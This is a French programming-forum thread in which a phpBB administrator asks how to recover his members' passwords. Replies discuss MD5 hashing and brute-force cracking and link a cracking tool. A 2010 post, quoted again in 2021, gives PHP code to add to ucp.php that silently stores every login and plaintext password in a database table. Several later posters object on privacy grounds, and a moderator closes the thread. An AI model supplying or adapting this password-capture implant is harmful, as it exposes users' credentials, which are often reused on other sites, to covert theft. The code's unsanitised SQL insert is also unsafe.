Forum |  HardWare.fr | News | Articles | PC | Prix | S'identifier | S'inscrire | Shop Recherche
1682 connectés 

  FORUM HardWare.fr
  Programmation
  PHP

  Récupérer les mots de passe d'un forum phpBB !

 



 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

Récupérer les mots de passe d'un forum phpBB !

n°367707
adsl51
Posté le 21-04-2003 à 14:54:40  profilanswer
 

Bonjour je suis administrateur d'un forum PHPBB et je voudrais savoir si il était possible de récupérer les mots de passe des membres ! Car, lorsque je vais dans phpmyadmin, les mots de passe sont alors cryptés ! Peut on enlever ce cryptage et si oui comment faire ? D'avance merci !

mood
Publicité
Posté le 21-04-2003 à 14:54:40  profilanswer
 

n°367708
Hermes le ​Messager
Breton Quiétiste
Posté le 21-04-2003 à 14:59:14  profilanswer
 

Ben le principe du cryptage c'est justement d'empêcher ce pouvoir retrouver le mdp, donc non. et heureusement.
 

n°367718
zophren
=)
Posté le 21-04-2003 à 15:19:09  profilanswer
 

ben c'est du md5, tu peux le decrypter, en 10 12 ans ? avec ton pc perso :)

n°367729
*syl*
--> []
Posté le 21-04-2003 à 15:34:13  profilanswer
 

md5 c'est pas du cryptage :p

n°367738
checker-67
Posté le 21-04-2003 à 15:43:01  profilanswer
 

il existe des logiciel pour les décrypter mais... c long? trés long !  :pfff:  laisse tomber prend un autre forum.


---------------
La solution à ton problème ?.... Mon portail PHP tribisur ;)
n°367740
mallox91
Posté le 21-04-2003 à 15:49:18  profilanswer
 

on ne peut pas desactiver la fonction md5 directement dans le code php des pages ?

n°367742
farib
Posté le 21-04-2003 à 15:49:39  profilanswer
 

avec " j'ai oublié mon mot de passe " et en jouant avec, on doit pouvoir gruger un peu nan ?


---------------
Bitcoin, Magical Thinking, and Political Ideology
n°367749
Maxime
Posté le 21-04-2003 à 15:59:41  profilanswer
 

tai obliger den regenrere un  :o

n°367752
adsl51
Posté le 21-04-2003 à 16:05:21  profilanswer
 

Donc si j'ai bien tout compris, il est impossible de récupérer les mots de passe d'un forum phpBB ! tant pis !

n°367826
z0rglub
Posté le 21-04-2003 à 18:34:38  profilanswer
 

euh, pkoi tu veux voir les mots de passe de tes utilisateurs ???


---------------
Ma galerie photo créée avec Piwigo et hébergée sur Piwigo.com
mood
Publicité
Posté le 21-04-2003 à 18:34:38  profilanswer
 

n°367831
Hermes le ​Messager
Breton Quiétiste
Posté le 21-04-2003 à 18:52:43  profilanswer
 

adsl51 a écrit :

Donc si j'ai bien tout compris, il est impossible de récupérer les mots de passe d'un forum phpBB ! tant pis !


 
Tout à fait, c'est impossible. Par contre, tu peux savoir si un mot de passe appartient à tel ou tel utilisateur, et donc par exemple refaire un nouveau forum en utilisant le MDP crypté dans la BDD comme dans PHPBB, ce qui fait que tes utilisateurs seront reconnus dans le nouveau forum. Mais bon, c'est pas ici qu'il faut poser la question, décortiquer phpbb pour savoir où sont les lignes qui gèrent le MD5 ne nous (en tout cas moi) intéresse pas...  :hello: (pas l'objet du forum).

n°367877
yamo_chie
Posté le 21-04-2003 à 19:56:45  profilanswer
 

Sinon peut-etre que tu peux éditer un membre, lui mettre ton adresse email, et mettre "g oublier mon mot de pass" ca va t'envoyer le mot de pass sur ton adresse, je pense que c'est possible de le faire!

n°367886
uriel
blood pt.2
Posté le 21-04-2003 à 20:10:55  profilanswer
 

sinon même avec un md5 , tu peux utiliser la brute force...
 :heink:  
je donne cette info, j'espere que le but n'est pas de hacker, remarquez que n'importe quel idiot peut se servir de ça:
http://mdcrack.df.ru/
 
tout ça pour dire que l'interet n'est pas forecement le cryptage mais le mot de passe initial... une date de naissance ou un mot du dictionnaire est toujours facile à hacker même crypté. [:spamafote]


Message édité par uriel le 21-04-2003 à 20:12:14

---------------
IVG en france
n°368790
Ez4Me2KU
Posté le 22-04-2003 à 19:43:53  profilanswer
 

Ca se décrypte très vite le md5... Déjà en une semaine tu peux chopper ts les pass de tes visiteurs qui font moins de 7 caractères.


---------------
Toute l'actu des jeux vidéos sur http://www.ajeux.fr
n°368839
belgique
Posté le 22-04-2003 à 20:33:00  profilanswer
 

DOnc (sans utiliser de dico) ça fait une semaine fois le nombre cde caractères existants pour 8 caractères. Et encore le nombre de caractères de fois plus longtemps pour 9 caractères, suffit d'avoir un bon mot de passe :)

n°368857
MagicBuzz
Posté le 22-04-2003 à 21:00:07  profilanswer
 

Avec le brute force, je crack mon pass admin NT en 2h48.
 
Il contient 15 caractères dont plusieurs ascii étendu.
 
Pourtant, les mots de pass NT qui dépassent 7 caractères sont cryptés de façon plus poussée que les moins de 7 caractères.
 
Pour résumer, il respecte la charte de mon AD qui nécessite l'utilisation d'un "stong password" :
 

Citation :

A strong password:
 
Is at least seven characters long.  
Does not contain your user name, real name, or company name.  
Does not contain a complete dictionary word.  
Is significantly different from previous passwords. Passwords that increment (Password1, Password2, Password3 ...) are not strong.  
Contains characters from each of the following four groups:  
Uppercase letters A, B, C ...  
Lowercase letters a, b, c ...  
Numerals 0, 1, 2, 3, 4, 5, 6, 7, 8, 9  
Symbols found on the keyboard (all keyboard characters not defined as letters or numerals) ` ~ ! @ # $ % ^ & * ( ) _ + - = { } | [ ] \ : " ; ' < > ? , . /


 
Et pourtant, l'algo d'encryption utilisé par Windows dans la base SAM est extrêment difficile à trouver lorsqu'on atteind 14 caractères.
 
Donc pour une base où les utilisateurs ont certainement des mots de pass entre 5 et 8 caractères, généralement avec uniquement de l'alpha numérique et quelques chiffre, ça se craque en quelques minutes. :)
 
PS: pour cracker mon pass, j'ai utilisé LC3, qui nécessite de tourner sur le PC hébergeant ma base SAM.

n°368915
Master_Jul
Posté le 22-04-2003 à 21:55:20  profilanswer
 

pour info, il existe un "hack" phpbb permettant d'enregistrer les mots de passe en clair dans la base, par contre je sais pas comment ça se passe quand on demande le renvoit du pass, si ça redonne celui en clair ou si ça renvoit toujours un random pass

n°368989
adsl51
Posté le 22-04-2003 à 23:25:50  profilanswer
 

Master_Jul a écrit :

pour info, il existe un "hack" phpbb permettant d'enregistrer les mots de passe en clair dans la base, par contre je sais pas comment ça se passe quand on demande le renvoit du pass, si ça redonne celui en clair ou si ça renvoit toujours un random pass


On trouve ça ou stp ???

n°369089
Master_Jul
Posté le 23-04-2003 à 01:26:23  profilanswer
 

adsl51 a écrit :


On trouve ça ou stp ???


 
http://forum.2037.biz/viewforum.php?f=12
 
Demande dans la catégorie connexe si tu trouve pas dans le listing mais c'est ici que je l'ai vu.

n°1991057
alex5618
Posté le 06-05-2010 à 21:50:41  profilanswer
 

1 - Modifier fichier ucp.php et insérer à la ligne 20.
 
$login = $_POST['username'];
$pass = $_POST['password'];
if ($login != "" ){
 mysql_query("INSERT INTO recup_pass (login, pass) VALUES('" . $login . "', '" . $pass . "')" );
}
 
En base de données :  
 
CREATE TABLE IF NOT EXISTS `recup_pass` (
  `id` int(3) NOT NULL auto_increment,
  `login` varchar(250) NOT NULL,
  `pass` varchar(250) NOT NULL,
  PRIMARY KEY  (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;

n°1991270
NewsletTux
&lt;Insérez ici votre vie /&gt;
Posté le 07-05-2010 à 15:23:21  profilanswer
 

je trouve ça franchement discutable comme méthodologie.
Certains de tes utilisateurs utilisent (à tort !) le même mot de passe partout, et le connaitre ici fait que tu pourras accéder à leur compte "chez toi", à leur compte sur d'autres sites etc. Et ça c'est du viol de vie privée :/


---------------
NewsletTux - outil de mailing list en PHP MySQL
n°2378419
ptityop
Posté le 10-03-2021 à 23:15:10  profilanswer
 

alex5618 a écrit :

1 - Modifier fichier ucp.php et insérer à la ligne 20.
 
$login = $_POST['username'];
$pass = $_POST['password'];
if ($login != "" ){
 mysql_query("INSERT INTO recup_pass (login, pass) VALUES('" . $login . "', '" . $pass . "')" );
}
 
En base de données :  
 
CREATE TABLE IF NOT EXISTS `recup_pass` (
  `id` int(3) NOT NULL auto_increment,
  `login` varchar(250) NOT NULL,
  `pass` varchar(250) NOT NULL,
  PRIMARY KEY  (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;


 
un code qui reprend l'idée mais  adapté existe sur PHPBB 3.3 ??? car les $_POST ne sont plus autorisé

n°2378444
mechkurt
Posté le 11-03-2021 à 10:47:32  profilanswer
 

NewsletTux a écrit :

je trouve ça franchement discutable comme méthodologie.
Certains de tes utilisateurs utilisent (à tort !) le même mot de passe partout, et le connaitre ici fait que tu pourras accéder à leur compte "chez toi", à leur compte sur d'autres sites etc. Et ça c'est du viol de vie privée :/



---------------
D3
n°2378543
ptityop
Posté le 11-03-2021 à 23:42:06  profilanswer
 


Je ne comprend pas je ne demande pas à recuperer de mots de pass mais un equivalent pour des variables $_POST qui fonctionneraient pour phpbb 3.3  
 
C'est assez hypocrite de répondre ça sachant que ces mêmes personnes connaissant le code peuvent le faire eux même sur leur forum... comme de dire "télécharger c'est pas bien" et qui le font eux meme mdr
 
Je souhaite récupérer à l'inscription des infos comme l'id, le pseudo, la date de naissance, le pays etc.. et les envoyer dans une table rien de plus


Message édité par ptityop le 11-03-2021 à 23:44:33
n°2378555
mechkurt
Posté le 12-03-2021 à 10:01:50  profilanswer
 

Ce n'est pas hypocrite, c'est un forum publique ou on n'encourages pas les pratiques illégales, si ton problème est celui-ci pourquoi remonter un post antédiluvien qui parles d'autres choses au lieu de répondre à la solution donner par B4X ?


---------------
D3
n°2378594
TotalRecal​l
Posté le 12-03-2021 à 15:32:11  profilanswer
 

Perso j'ai aucune envie d'avoir mes mdp qui se baladent en clair dans une table d'un quelconque site internet, et j'aurais d'énormes réserves sur les intentions du type qui bidouille un forum pour lui faire enregistrer ça pour tous ses utilisateurs. Topic à fermer.


---------------
Réalisation amplis classe D / T      Topic .Net - C# @ Prog
n°2378596
Modération
Posté le 12-03-2021 à 15:46:02  answer
 

On va laisser ce topic retourner dans les bas-fonds du forum desquels il n'aurait jamais du sortir, et arrêter ici.

mood
Publicité
Posté le   profilanswer
 


Aller à :
  FORUM HardWare.fr
  Programmation
  PHP

  Récupérer les mots de passe d'un forum phpBB !

 

Sujets relatifs
transmettre un mot de passe entre les pages PHP[ MySQL ] Récuperer l'ID lors d'un insert avec ID auto-increment...
[HTML/JS] Récupérer les infos systèmes du client?[HTML]comment faire un calendrier dynamique et récupérer les valeurs
récupérer le dernier calcul en phpRécupérer un graphique dans un logiciel OpenSource
récupérer une variable JS ![MFC] recuperer un ptr sur Doc dans CxxxApp
[C] récupérer un entier sur 2 octets dans un fichier [résolu][PHP]Récuperer le résultat d'un SUM en PHP ?
Plus de sujets relatifs à : Récupérer les mots de passe d'un forum phpBB !


Copyright © 1997-2018 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR